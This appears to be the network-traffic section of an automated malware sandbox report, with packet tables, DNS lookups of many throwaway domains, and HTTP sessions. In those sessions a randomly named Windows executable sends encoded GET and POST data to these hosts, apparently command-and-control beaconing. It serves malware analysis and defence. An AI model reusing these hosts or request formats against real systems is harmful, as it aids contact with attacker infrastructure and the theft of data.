Nov 11, 2024 08:34:26.734217882 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734261036 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734265089 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734311104 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734316111 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734366894 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734370947 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.734380960 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:27.150579929 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:27.153276920 CET	50053	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:28.243235111 CET	50053	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:28.248167992 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:29.259180069 CET	50054	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:29.264204979 CET	80	50054	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:29.264267921 CET	50054	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:29.275306940 CET	50054	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:29.280230999 CET	80	50054	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:29.703192949 CET	80	50054	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:29.709355116 CET	80	50054	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:29.709427118 CET	50054	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:29.710401058 CET	50054	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:29.715229988 CET	80	50054	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:35.222877026 CET	50055	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:35.227771044 CET	80	50055	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:35.227837086 CET	50055	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:35.240823984 CET	50055	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:35.245717049 CET	80	50055	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:36.039155006 CET	80	50055	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:36.084084988 CET	50055	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:36.238451958 CET	80	50055	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:36.245253086 CET	50055	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:36.756015062 CET	50055	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:37.776024103 CET	50056	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:37.781097889 CET	80	50056	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:37.781162977 CET	50056	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:37.793649912 CET	50056	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:37.798666000 CET	80	50056	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:38.592226028 CET	80	50056	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:38.787148952 CET	50056	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:38.791019917 CET	80	50056	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:38.793345928 CET	50056	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:39.302829981 CET	50056	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:40.325336933 CET	50057	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:40.330243111 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.337313890 CET	50057	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:40.344938040 CET	50057	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:40.353868961 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354023933 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354129076 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354259014 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354362011 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354708910 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354712963 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354795933 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:40.354804993 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:41.153666019 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:41.209017992 CET	50057	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:41.352133989 CET	80	50057	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:41.352185011 CET	50057	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:41.849769115 CET	50057	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:42.868670940 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:42.873601913 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:42.875510931 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:42.883171082 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:42.888047934 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:43.685138941 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:43.740298033 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:43.883981943 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:43.884067059 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:43.885521889 CET	50058	80	192.168.2.4	154.23.184.95
Nov 11, 2024 08:34:43.890352964 CET	80	50058	154.23.184.95	192.168.2.4
Nov 11, 2024 08:34:48.945668936 CET	50059	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:48.950479031 CET	80	50059	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:48.951807976 CET	50059	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:48.963349104 CET	50059	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:48.968163013 CET	80	50059	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:49.514203072 CET	80	50059	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:49.589883089 CET	80	50059	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:49.589931011 CET	50059	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:50.475476027 CET	50059	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:51.493582964 CET	50060	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:51.498584032 CET	80	50060	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:51.498645067 CET	50060	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:51.509109974 CET	50060	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:51.514261961 CET	80	50060	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:52.071635962 CET	80	50060	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:52.115376949 CET	50060	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:52.146318913 CET	80	50060	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:52.146503925 CET	50060	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:53.025352001 CET	50060	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:54.045852900 CET	50061	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:54.050878048 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.051002026 CET	50061	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:54.062510014 CET	50061	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:54.067419052 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067429066 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067471027 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067476034 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067568064 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067572117 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067615986 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067620039 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.067630053 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.614506006 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.689644098 CET	80	50061	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:54.693499088 CET	50061	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:55.568567991 CET	50061	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:56.586909056 CET	50062	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:56.592086077 CET	80	50062	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:56.592156887 CET	50062	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:56.601366997 CET	50062	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:56.606261969 CET	80	50062	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:57.154460907 CET	80	50062	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:57.229370117 CET	80	50062	185.27.134.144	192.168.2.4
Nov 11, 2024 08:34:57.229451895 CET	50062	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:57.231009007 CET	50062	80	192.168.2.4	185.27.134.144
Nov 11, 2024 08:34:57.235835075 CET	80	50062	185.27.134.144	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 08:31:19.626570940 CET	53210	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:31:20.630775928 CET	53210	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:31:20.683773041 CET	53	53210	1.1.1.1	192.168.2.4
Nov 11, 2024 08:31:20.683824062 CET	53	53210	1.1.1.1	192.168.2.4
Nov 11, 2024 08:31:36.731829882 CET	56593	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:31:36.739240885 CET	53	56593	1.1.1.1	192.168.2.4
Nov 11, 2024 08:31:50.258851051 CET	65068	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:31:50.273390055 CET	53	65068	1.1.1.1	192.168.2.4
Nov 11, 2024 08:32:03.368952036 CET	61990	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:32:03.800192118 CET	53	61990	1.1.1.1	192.168.2.4
Nov 11, 2024 08:32:17.260921955 CET	63429	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:32:17.294662952 CET	53	63429	1.1.1.1	192.168.2.4
Nov 11, 2024 08:32:30.510478020 CET	63167	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:32:31.172753096 CET	53	63167	1.1.1.1	192.168.2.4
Nov 11, 2024 08:32:45.423356056 CET	61475	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:32:45.461297989 CET	53	61475	1.1.1.1	192.168.2.4
Nov 11, 2024 08:32:58.789933920 CET	52139	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:32:58.803303957 CET	53	52139	1.1.1.1	192.168.2.4
Nov 11, 2024 08:33:12.088536978 CET	51866	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:33:12.137365103 CET	53	51866	1.1.1.1	192.168.2.4
Nov 11, 2024 08:33:25.994667053 CET	52984	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:33:26.417272091 CET	53	52984	1.1.1.1	192.168.2.4
Nov 11, 2024 08:33:40.167736053 CET	56453	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:33:40.207129955 CET	53	56453	1.1.1.1	192.168.2.4
Nov 11, 2024 08:33:53.650291920 CET	50484	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:33:54.114847898 CET	53	50484	1.1.1.1	192.168.2.4
Nov 11, 2024 08:34:07.993634939 CET	62123	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:34:08.020529032 CET	53	62123	1.1.1.1	192.168.2.4
Nov 11, 2024 08:34:21.368880987 CET	56799	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:34:21.626770020 CET	53	56799	1.1.1.1	192.168.2.4
Nov 11, 2024 08:34:34.728950977 CET	50715	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:34:35.219871998 CET	53	50715	1.1.1.1	192.168.2.4
Nov 11, 2024 08:34:48.903362989 CET	61450	53	192.168.2.4	1.1.1.1
Nov 11, 2024 08:34:48.940623999 CET	53	61450	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 08:31:19.626570940 CET	192.168.2.4	1.1.1.1	0x3c20	Standard query (0)	www.jllllbx.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:20.630775928 CET	192.168.2.4	1.1.1.1	0x3c20	Standard query (0)	www.jllllbx.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:36.731829882 CET	192.168.2.4	1.1.1.1	0x5eef	Standard query (0)	www.college-help.info	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:50.258851051 CET	192.168.2.4	1.1.1.1	0x69cc	Standard query (0)	www.binacamasala.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:03.368952036 CET	192.168.2.4	1.1.1.1	0xc510	Standard query (0)	www.marketplacer.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:17.260921955 CET	192.168.2.4	1.1.1.1	0x79c4	Standard query (0)	www.energyparks.net	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:30.510478020 CET	192.168.2.4	1.1.1.1	0xf554	Standard query (0)	www.yvrkp.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:45.423356056 CET	192.168.2.4	1.1.1.1	0x365b	Standard query (0)	www.flikka.site	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:58.789933920 CET	192.168.2.4	1.1.1.1	0xe84e	Standard query (0)	www.ladylawher.shop	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:12.088536978 CET	192.168.2.4	1.1.1.1	0xfbb4	Standard query (0)	www.primeproperty.property	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:25.994667053 CET	192.168.2.4	1.1.1.1	0xe9c7	Standard query (0)	www.kghjkx.xyz	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:40.167736053 CET	192.168.2.4	1.1.1.1	0xd142	Standard query (0)	www.iuyi542.xyz	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:53.650291920 CET	192.168.2.4	1.1.1.1	0xf847	Standard query (0)	www.neg21.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:07.993634939 CET	192.168.2.4	1.1.1.1	0xc10	Standard query (0)	www.digitaladpro.shop	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:21.368880987 CET	192.168.2.4	1.1.1.1	0x3e7b	Standard query (0)	www.loginov.enterprises	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:34.728950977 CET	192.168.2.4	1.1.1.1	0x9bc6	Standard query (0)	www.wcp95.top	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:48.903362989 CET	192.168.2.4	1.1.1.1	0x1b35	Standard query (0)	www.hasthosting.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 08:31:20.683773041 CET	1.1.1.1	192.168.2.4	0x3c20	No error (0)	www.jllllbx.top		156.234.28.94	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:20.683824062 CET	1.1.1.1	192.168.2.4	0x3c20	No error (0)	www.jllllbx.top		156.234.28.94	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:36.739240885 CET	1.1.1.1	192.168.2.4	0x5eef	No error (0)	www.college-help.info		38.88.82.56	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:50.273390055 CET	1.1.1.1	192.168.2.4	0x69cc	No error (0)	www.binacamasala.com	binacamasala.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:31:50.273390055 CET	1.1.1.1	192.168.2.4	0x69cc	No error (0)	binacamasala.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:31:50.273390055 CET	1.1.1.1	192.168.2.4	0x69cc	No error (0)	binacamasala.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:03.800192118 CET	1.1.1.1	192.168.2.4	0xc510	No error (0)	www.marketplacer.top		194.58.112.174	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:17.294662952 CET	1.1.1.1	192.168.2.4	0x79c4	No error (0)	www.energyparks.net	energyparks.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:32:17.294662952 CET	1.1.1.1	192.168.2.4	0x79c4	No error (0)	energyparks.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:17.294662952 CET	1.1.1.1	192.168.2.4	0x79c4	No error (0)	energyparks.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:31.172753096 CET	1.1.1.1	192.168.2.4	0xf554	No error (0)	www.yvrkp.top		104.21.14.183	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:31.172753096 CET	1.1.1.1	192.168.2.4	0xf554	No error (0)	www.yvrkp.top		172.67.160.35	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:45.461297989 CET	1.1.1.1	192.168.2.4	0x365b	No error (0)	www.flikka.site		67.223.117.142	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:58.803303957 CET	1.1.1.1	192.168.2.4	0xe84e	No error (0)	www.ladylawher.shop	ladylawher.shop		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:32:58.803303957 CET	1.1.1.1	192.168.2.4	0xe84e	No error (0)	ladylawher.shop		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:32:58.803303957 CET	1.1.1.1	192.168.2.4	0xe84e	No error (0)	ladylawher.shop		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:12.137365103 CET	1.1.1.1	192.168.2.4	0xfbb4	No error (0)	www.primeproperty.property	dns.webcake.io		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:33:12.137365103 CET	1.1.1.1	192.168.2.4	0xfbb4	No error (0)	dns.webcake.io		113.20.119.31	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:26.417272091 CET	1.1.1.1	192.168.2.4	0xe9c7	No error (0)	www.kghjkx.xyz		47.129.103.185	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:40.207129955 CET	1.1.1.1	192.168.2.4	0xd142	No error (0)	www.iuyi542.xyz	iuyi542.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:33:40.207129955 CET	1.1.1.1	192.168.2.4	0xd142	No error (0)	iuyi542.xyz		38.47.237.27	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:33:54.114847898 CET	1.1.1.1	192.168.2.4	0xf847	No error (0)	www.neg21.top	neg21.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:33:54.114847898 CET	1.1.1.1	192.168.2.4	0xf847	No error (0)	neg21.top		206.119.81.36	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:08.020529032 CET	1.1.1.1	192.168.2.4	0xc10	No error (0)	www.digitaladpro.shop	ghs.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:34:08.020529032 CET	1.1.1.1	192.168.2.4	0xc10	No error (0)	ghs.google.com		142.250.184.211	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:21.626770020 CET	1.1.1.1	192.168.2.4	0x3e7b	No error (0)	www.loginov.enterprises	loginov.enterprises		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:34:21.626770020 CET	1.1.1.1	192.168.2.4	0x3e7b	No error (0)	loginov.enterprises		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:21.626770020 CET	1.1.1.1	192.168.2.4	0x3e7b	No error (0)	loginov.enterprises		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:35.219871998 CET	1.1.1.1	192.168.2.4	0x9bc6	No error (0)	www.wcp95.top	wcp95.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 08:34:35.219871998 CET	1.1.1.1	192.168.2.4	0x9bc6	No error (0)	wcp95.top		154.23.184.95	A (IP address)	IN (0x0001)	false
Nov 11, 2024 08:34:48.940623999 CET	1.1.1.1	192.168.2.4	0x1b35	No error (0)	www.hasthosting.xyz		185.27.134.144	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.jllllbx.top

www.college-help.info

www.binacamasala.com

www.marketplacer.top

www.energyparks.net

www.yvrkp.top

www.flikka.site

www.ladylawher.shop

www.primeproperty.property

www.kghjkx.xyz

www.iuyi542.xyz

www.neg21.top

www.digitaladpro.shop

www.loginov.enterprises

www.wcp95.top

www.hasthosting.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	156.234.28.94	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:20.702200890 CET	532	OUT	GET /s7rc/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=6DRnIJ+Fte42OB/5XahWefuJxFukpBxOvMg5DpP/yyjJNxXWq01mXWJaUM52jX/tQu57he5PJxxVPcJX3Ib35ixrzLdezhzqPCe9qS9F0Axe4HxDKFQRrXU= HTTP/1.1 Host: www.jllllbx.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:31:21.491584063 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 07:31:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Set-Cookie: _sessionsid=OTE2YzNjMjUwYmRjYjM5ODAwMzY0NTY3ZjQwMThkNjE=; path=/; expires=Mon, 18 Nov 2024 07:31:21 GMT Data Raw: 37 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 34 35 3b 26 23 36 35 3b 26 23 38 30 3b 26 23 38 30 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 [TRUNCATED] Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>TCG彩票官网-APP下载</title><meta name="keywords" content="TCG彩票官网-APP下载"/><meta name="description" content="⚽️⚽️⚽️TCG彩票APP&#55356;&#57144;yk188.cc✅顶级下注平台,提供TCG彩票网站,TCG彩票最新官网,TCG彩票app下载,各种娱乐品种应有尽有&#44
Nov 11, 2024 08:31:21.491633892 CET	890	IN	Data Raw: 3b 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 33 34 34 38 3b 26 23 32 36 30 34 31 3b 26 23 32 33 34 35 38 3b 26 23 32 36 33 38 31 3b 26 23 Data Ascii: ;TCG彩票网站官方客服24小时在线为您服务!"/><script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){docu
Nov 11, 2024 08:31:21.491800070 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	38.88.82.56	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:31:36.761873007 CET	805	OUT	POST /fu91/ HTTP/1.1 Host: www.college-help.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.college-help.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.college-help.info/fu91/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 4b 58 62 46 59 64 78 42 76 41 48 48 50 4d 6d 67 6f 55 43 4b 32 62 49 50 77 45 47 35 6f 70 6e 32 59 4f 63 56 42 69 49 39 67 35 38 55 56 4a 62 71 64 55 47 35 59 35 32 44 63 72 5a 42 30 54 6a 69 75 69 2f 4e 4c 59 2f 6c 73 5a 4b 68 58 7a 54 31 45 66 43 4c 4f 78 41 6c 68 74 74 51 30 79 76 47 45 72 4f 67 70 7a 33 66 54 44 6a 6b 57 77 4c 5a 4a 41 53 68 7a 48 77 37 4f 6d 73 56 65 44 53 74 4a 61 47 6e 47 6d 78 47 57 4b 2b 38 4d 30 6b 2b 4c 75 62 2f 7a 79 59 65 49 71 48 47 59 48 31 4d 75 33 32 45 49 30 53 59 33 4a 49 46 4e 39 54 4f 72 2f 6d 4b 2b 2b 36 6a 58 38 53 33 50 44 75 42 64 67 3d 3d Data Ascii: Ir8HUj=KXbFYdxBvAHHPMmgoUCK2bIPwEG5opn2YOcVBiI9g58UVJbqdUG5Y52DcrZB0Tjiui/NLY/lsZKhXzT1EfCLOxAlhttQ0yvGErOgpz3fTDjkWwLZJAShzHw7OmsVeDStJaGnGmxGWK+8M0k+Lub/zyYeIqHGYH1Mu32EI0SY3JIFN9TOr/mK++6jX8S3PDuBdg==
Nov 11, 2024 08:31:37.323112011 CET	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:31:37 GMT Server: Apache Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT ETag: "49d-626426de29b28" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 